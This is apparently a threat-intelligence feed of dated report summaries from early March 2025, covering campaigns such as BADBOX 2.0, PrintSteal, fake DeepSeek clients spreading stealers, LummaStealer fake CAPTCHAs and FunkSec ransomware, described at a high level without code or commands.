HUMAN's Satori Threat Intelligence team uncovered and partially disrupted BADBOX 2.0, a complex fraud operation targeting low-cost consumer devices. This operation, an expansion of the 2023 BADBOX scheme, infected over 1 million Android Open Source Project devices worldwide with a backdoor called BB2DOOR. The infection enabled various fraud schemes, including residential proxy services, ad fraud, and click fraud. Four threat actor groups were identified: SalesTracker Group, MoYu Group, Lemon Group, and LongTV. The operation targeted devices in 222 countries, with Brazil being the most affected. HUMAN collaborated with Google and other partners to disrupt the infrastructure and protect customers from the threat.
PrintSteal: Exposing unauthorized CSC-Impersonating Websites Engaging in Large-Scale KYC Document Generation Fraud
released on 2025-03-06 @ 12:31:04 PM
This investigation uncovers a massive criminal operation known as 'PrintSteal' that generates and distributes fake Indian KYC documents. The scheme involves over 1,800 fraudulent domains impersonating government websites, with at least 2,727 registered operators on one platform alone. Over 167,000 fake documents have been created, including birth certificates, Aadhaar cards, and PAN cards. The operation uses a network of affiliates, illicit APIs, and encrypted communication channels. Financial analysis shows an estimated 40 Lakhs in revenue from a single platform. The widespread nature of this fraud poses significant risks to India's digital security, financial systems, and public trust in government services.
Stealers and backdoors are spreading under the guise of a DeepSeek client
released on 2025-03-06 @ 12:31:03 PM
Cybercriminals are exploiting the popularity of DeepSeek, a powerful reasoning large language model, by creating fake websites that mimic the official DeepSeek chatbot site and distribute malicious code disguised as a client. Three main schemes were identified: a Python stealer targeting user data and credentials, a malicious script spreading through social media posts, and backdoors targeting Chinese users. The attacks use various methods to lure victims, including typosquatting and ad traffic. Users are advised to carefully check website addresses and be cautious of unverified links, especially for popular services. The malware distributed includes stealers, backdoors, and trojans, potentially leading to data theft and remote access to victims' computers.
The Next Level: Typo DGAs Used in Malicious Redirection Chains
released on 2025-03-06 @ 12:31:01 PM
A new campaign leveraging newly registered domains (NRDs) and a novel variant of domain generation algorithms (DGAs) has been uncovered. The campaign used over 6,000 NRDs redirecting to domains resembling dictionary-based DGAs. These NRDs led to advertisements of potentially unwanted Android applications. Further investigation revealed 444,898 NRDs belonging to the same actor, redirecting to 178 domains exhibiting 'typo DGA' characteristics. This new pattern combines dictionary words with typographical errors, potentially designed to evade traditional detection methods. The campaign utilized shared WHOIS information, hosting infrastructure, and epoch timestamp subdomains for redirections. The findings highlight the need for advanced detection capabilities to combat evolving malicious techniques.
The Evolution of Dark Caracal Tools: Campaign Analysis Using the Poco RAT
released on 2025-03-05 @ 06:21:14 PM
Attacks using the Poco RAT are a continuation of the Dark Caracal group's campaign. This campaign was launched in 2022 and is aimed at Spanish-speaking countries in Latin America.
New DDoS Botnet Discovered: Over 30,000 Hacked Devices, Majority of Observed Activity Traced to Iran
released on 2025-03-05 @ 05:55:50 PM
A new botnet that infects tens of thousands of internet-connected devices has been identified as being linked to Iran, according to research by GreyNoise, Nokia Deepfield, and Censys.
Beneath the Surface: Detecting and Blocking Hidden Malicious Traffic Distribution Systems
released on 2025-03-05 @ 04:24:49 PM
This analysis explores the use of traffic distribution systems (TDS) by threat actors to redirect network traffic for illicit purposes like phishing and malvertising. TDS act as central hubs, obfuscating final destinations and hindering detection. The study found that malicious TDS exhibit distinct topological characteristics compared to benign networks, including longer redirection chains, more URLs, and higher connectivity. Using these insights, a machine learning-based detection system was developed to identify various types of malicious TDS infrastructure. The research also presents case studies of TDS usage in phishing campaigns, malvertising, darknet services, and cloaking techniques.
Winos 4.0 Spreads via Impersonation of Official Email to Target Users in Taiwan
released on 2025-03-05 @ 04:04:42 PM
An advanced malware framework known as Winos4.0 was used to target companies in Taiwan in January 2025.
Astrill VPN and DPRK Remote Worker Fraud
released on 2025-03-05 @ 03:34:50 PM
Spur Engineering is releasing a comprehensive list of IP addresses associated with the Astrill VPN service to help companies protect against fraud and abuse from the Democratic Republic of Korea (DPRK) in the future.
Remcos RAT Targets Europe: New AMSI and ETW Evasion Tactics Uncovered
released on 2025-03-05 @ 02:57:15 PM
This week, the SonicWall threat research team discovered a new update in the Remcos infection chain aimed at enhancing its stealth by patching AMSI scanning and ETW logging to evade detection. This loader was seen distributing Async RAT in the past, but it has now extended its functionality to Remcos RAT and other malware families. From our analysis, it seems to be targeting European institutions.
SilentCryptoMiner distributed as a bypass tool
released on 2025-03-05 @ 11:12:16 AM
A mass malware campaign is infecting users with a cryptocurrency miner disguised as a tool for bypassing internet restrictions. The campaign has affected over 2,000 victims in Russia, utilizing YouTube channels to spread malicious links. Attackers are blackmailing content creators to post videos with infected file links, threatening channel shutdowns. The malware uses a multi-stage infection process, including a Python loader that downloads and executes the SilentCryptoMiner. This miner, based on XMRig, employs stealth techniques like process hollowing and can mine various cryptocurrencies. The campaign highlights the growing exploitation of restriction bypass tools for malware distribution, posing significant risks to user data security.
Call It What You Want: Threat Actor Delivers Highly Targeted Multistage Polyglot Malware
released on 2025-03-04 @ 10:43:54 PM
A highly targeted email-based campaign was identified, focusing on aviation and satellite communications organizations in the United Arab Emirates. The campaign utilized a compromised entity to send customized malicious messages, leading to the discovery of a new backdoor named Sosano. This malware employed various obfuscation techniques, including polyglot files, indicating a sophisticated adversary. The infection chain involved multiple stages, using LNK files, HTA scripts, and XOR encoding. The Sosano backdoor, written in Golang, contains limited functionality but is heavily obfuscated. The threat actor, tracked as UNK_CraftyCamel, shows possible connections to Iranian-aligned adversaries but is considered a separate entity. This campaign highlights the use of trusted relationships to deliver customized, obfuscated malware to selective targets.
Exposing the Deception: Russian EFF Impersonators Behind Stealc & Pyramid C2
released on 2025-03-04 @ 10:43:54 PM
A threat group impersonating the Electronic Frontier Foundation (EFF) is targeting Albion Online players through phishing messages and decoy documents. The campaign uses malware such as Stealc stealer and Pyramid C2 to compromise player accounts. Analysis of an exposed directory revealed PowerShell scripts, PDFs, and malicious payloads. The infrastructure includes multiple servers sharing SSH keys. Code comments suggest Russian-speaking developers. The attackers use EFF's reputation to lend credibility while executing malware in the background. The campaign exploits the game's player-driven economy, where in-game assets have real-world value. Mitigation strategies include cautious handling of unsolicited communications and verifying sources' authenticity.
Analysis of a JavaScript-based Phishing Campaign Targeting Microsoft 365 Credentials
released on 2025-03-04 @ 08:57:45 PM
A sophisticated JavaScript-based credential harvesting campaign has been discovered, utilizing fake voicemail notifications to capture Microsoft 365 credentials. The attackers employ HTML smuggling, obfuscation, and encryption techniques to evade detection. The phishing emails contain PDF attachments with QR codes and HTM files with embedded JavaScript. The malicious code uses base64 encoding, CryptoJS for encryption, and dynamic URL generation to redirect victims to a fake Microsoft 365 login page. The campaign involves multiple stages, including CAPTCHA and media player mimicry, to increase legitimacy. This evolving threat poses significant challenges for automated detection and analysis systems.
Booking a Threat: Inside LummaStealer's Fake reCAPTCHA
released on 2025-03-04 @ 03:14:01 PM
A new malicious campaign targeting booking websites has been discovered, utilizing LummaStealer, an info-stealer operating under a Malware-as-a-Service model. The attack employs fake CAPTCHAs to trick users into executing malicious PowerShell commands. Initially targeting the Philippines, the campaign has expanded globally, focusing on malvertising. The infection chain involves a fake booking confirmation link, obfuscated PHP scripts, and payload download mechanisms. LummaStealer samples in this attack are significantly larger, with up to a 350% increase in size, and use techniques like Binary Padding and Indirect Control Flow for evasion. The campaign's sophistication and global reach indicate a growing threat in the cybercrime landscape.
Deep Dive Into Allegedly AI-Generated FunkSec Ransomware
released on 2025-03-04 @ 03:59:21 AM
A new Rust-based ransomware called FunkSec has emerged, claiming to use artificial intelligence in its development. First appearing in 2024, it demonstrates a mix of sophisticated capabilities and developmental inconsistencies. FunkSec implements advanced features like XChaCha20 encryption and comprehensive anti-VM techniques, but also shows peculiarities such as dependency on downloading a specific wallpaper image. The malware disables Windows security features, establishes persistence via scheduled tasks, and targets multiple file extensions. It employs various evasion techniques, including disabling event logging and real-time protection. The ransomware's execution reveals technical anomalies, suggesting it may still be in development and could evolve further.
Havoc: SharePoint with Microsoft Graph API turns into FUD C2
released on 2025-03-03 @ 06:02:14 PM
A phishing campaign combines ClickFix and multi-stage malware to deploy a modified Havoc Demon Agent. The attack starts with an HTML attachment using ClickFix to deceive users into executing malicious PowerShell commands. The malware stages are hidden behind SharePoint sites, and a modified Havoc Demon uses Microsoft Graph API to obscure C2 communications. The attack chain includes sandbox evasion, Python shellcode loader, KaynLdr for DLL loading, and a customized Havoc Demon DLL. The threat actor creates two files in SharePoint for C2 communication, encrypts data with AES-256, and supports various malicious commands. This campaign demonstrates the integration of public services with modified open-source tools to evade detection.
Uncovering .NET Malware Obfuscated by Encryption and Virtualization
released on 2025-03-03 @ 04:54:17 PM
This article examines advanced obfuscation techniques used in popular malware families like Agent Tesla, XWorm, and FormBook/XLoader. The techniques include code virtualization, staged payload delivery, dynamic code loading, AES encryption, and multi-stage payloads. The malware uses a three-stage process: an encrypted payload in the PE overlay, a virtualized payload using KoiVM, and a final payload that is typically Agent Tesla or XWorm. The obfuscation methods aim to evade sandbox detection and hinder static analysis. The article provides insights into extracting configuration parameters through unpacking each stage and discusses potential automation opportunities for sandboxes performing static analysis.
Black Basta and Cactus Ransomware Groups Add BackConnect Malware to Their Arsenal
released on 2025-03-03 @ 08:12:06 AM
The Black Basta and Cactus ransomware groups have incorporated BackConnect malware into their attack strategies to maintain persistent control over compromised systems. The attackers use social engineering tactics, including email flooding and impersonation of IT support, to gain initial access. They exploit Microsoft Teams and Quick Assist for unauthorized access and privilege escalation. The malware is deployed through abuse of OneDriveStandaloneUpdater.exe, which side-loads malicious DLLs. The attackers utilize commercial cloud storage services to host and distribute malicious files. Since October 2024, most incidents occurred in North America and Europe, with the US being the most affected. The manufacturing sector was the primary target, followed by financial and real estate industries.
Astrill VPN: New IPs Publicly Released on VPN Service Heavily Used by North Korean Threat Actors
released on 2025-03-01 @ 06:36:14 PM
North Korean threat actors, particularly from the Lazarus Group, continue to utilize Astrill VPN to conceal their IP addresses during attacks. Recent infrastructure and logs from the 'Contagious Interview' subgroup confirmed ongoing use of Astrill VPN in their operations. Google's Mandiant and Recorded Future's Insikt Group have also reported on DPRK threat actors' preference for this VPN service. Silent Push analysts have developed a 'Bulk Data Feed' of Astrill VPN IPs, updated in real-time, to help protect against threats. The research includes confirmation of Astrill VPN usage in recent attacks, including the $1.4 billion ByBit heist. A sample list of active Astrill VPN IP addresses is provided, with more comprehensive data available to enterprise users.